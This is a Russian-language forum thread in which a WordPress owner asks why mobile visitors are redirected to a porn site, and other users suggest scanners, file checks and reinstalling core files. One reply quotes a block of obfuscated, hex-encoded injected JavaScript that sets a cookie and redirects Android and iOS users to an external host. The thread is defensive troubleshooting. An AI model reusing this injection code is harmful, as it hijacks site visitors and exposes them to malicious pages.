[DaImeR]

С таким столкнулся впервые
Ситуация: каждое утро с 11 до 13 по мск при заходе через мобильные устройства (в моем случае iPhone 5 и Galaxy 3) перенаправляет на левый порно сайт.
Что делал:
1. Проверял через стандартные плагины Wordfence Security и AntiVirus
2. Проверял файлы по дате изменения на сервере
3. Отключал все плагины, удалил лишние темы
4. Скачал на ПК и проверил Касперским
5. Просмотрел логи сервера на предмет подозрительных действия и ничего

Что еще может быть?
Пациент:

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

[Fartuna]

DaImeR,Посмотри файл htaccess на редиректы, посмотри папки uploads.

[DaImeR]

Посмотри файл htaccess на редиректы, посмотри папки uploads.

В первую очередь их проверил. Сканировал, копал вручную и ничего

[Bposter]

Бесплатный скрипт для поиска вирусов и прочей хрени на сайте _http://revisium.com/ai/

[Fartuna]

DaImeR, Проверь свой сайт этим (манул) и не мешало бы и телефоны свои проверить на "бяку"

[DaImeR]

Проверь свой сайт этим (манул) и не мешало бы и телефоны свои проверить на "бяку"

Благодарю, сейчас проверим. Если бы это было только у меня, но это пошло от клиента, проверено на многих телефонах.

У меня есть подозрение на хостера https://hostenko.com/, стоит их версия дистрибьютива и она кишит ссылками на этот хостинг

[Fartuna]

стоит их версия дистрибьютива

Еще как вариант.
Скачай с оф сайта движок. На своем хостинге удали все файлы движка, кроме папки wp-content и файла wp-config и залей оригинальные файлы.(не забудь сделать бекап старых файлов, на всякий случай)

[Bposter]

На DLE такая фигня была, глянь js файлы чуть что, или смени шаблон на любой и проверь если не будет перенаправлять тогда ищи в файлах шаблона

И вот эта строка стремная

Код HTML:

'padding': </script><script>var x=readCookie("\x74\x64\x73\x6B\x6A");if(!x){createCookie("\x74\x64\x73\x6B\x6A","\x74\x65\x73\x74\x63\x6F\x6F\x6B\x69\x65",1);if(navigator["\x75\x73\x65\x72\x41\x67\x65\x6E\x74"]["\x6D\x61\x74\x63\x68"](/Android/i)){window["\x6C\x6F\x63\x61\x74\x69\x6F\x6E"]="\x68\x74\x74\x70\x3A\x2F\x2F\x77\x69\x65\x79\x66\x67\x69\x77\x65\x31\x2E\x69\x67\x6E\x6F\x72\x65\x6C\x69\x73\x74\x2E\x63\x6F\x6D\x2F\x65\x30\x32\x7A"}else {if(navigator["\x75\x73\x65\x72\x41\x67\x65\x6E\x74"]["\x6D\x61\x74\x63\x68"](/iPhone|iPad|iPod/i)){window["\x6C\x6F\x63\x61\x74\x69\x6F\x6E"]="\x68\x74\x74\x70\x3A\x2F\x2F\x77\x69\x65\x79\x66\x67\x69\x77\x65\x31\x2E\x69\x67\x6E\x6F\x72\x65\x6C\x69\x73\x74\x2E\x63\x6F\x6D\x2F\x65\x30\x32\x44"}};};function createCookie(_0xee32x2,_0xee32x3,_0xee32x4){if(_0xee32x4){var _0xee32x5= new Date();_0xee32x5["\x73\x65\x74\x54\x69\x6D\x65"](_0xee32x5["\x67\x65\x74\x54\x69\x6D\x65"]()+(_0xee32x4*24*60*60*1000));var _0xee32x6="\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D"+_0xee32x5["\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67"]();}else {var _0xee32x6=""};document["\x63\x6F\x6F\x6B\x69\x65"]=_0xee32x2+"\x3D"+_0xee32x3+_0xee32x6+"\x3B\x20\x70\x61\x74\x68\x3D\x2F";}function readCookie(_0xee32x2){var _0xee32x8=_0xee32x2+"\x3D";var _0xee32x9=document["\x63\x6F\x6F\x6B\x69\x65"]["\x73\x70\x6C\x69\x74"]("\x3B");for(var _0xee32xa=0;_0xee32xa<_0xee32x9["\x6C\x65\x6E\x67\x74\x68"];_0xee32xa++){var _0xee32xb=_0xee32x9[_0xee32xa];while(_0xee32xb["\x63\x68\x61\x72\x41\x74"](0)=="\x20"){_0xee32xb=_0xee32xb["\x73\x75\x62\x73\x74\x72\x69\x6E\x67"](1,_0xee32xb["\x6C\x65\x6E\x67\x74\x68"])};if(_0xee32xb["\x69\x6E\x64\x65\x78\x4F\x66"](_0xee32x8)==0){return _0xee32xb["\x73\x75\x62\x73\x74\x72\x69\x6E\x67"](_0xee32x8["\x6C\x65\x6E\x67\x74\x68"],_0xee32xb["\x6C\x65\x6E\x67\x74\x68"])};};return null;}</script><script>,
	

[schastye]

Если хтакцесс чист, сравни все js с эталонными; на гитхаб почти плагины есть

[worldfoto]

У меня есть подозрение на хостера https://hostenko.com/, стоит их версия дистрибьютива и она кишит ссылками на этот хостинг

Если в дистрибьютиве есть ссылки. тогда вы ответили на свой вопрос. если вы их изначально удалили. при обновлении они обратно появились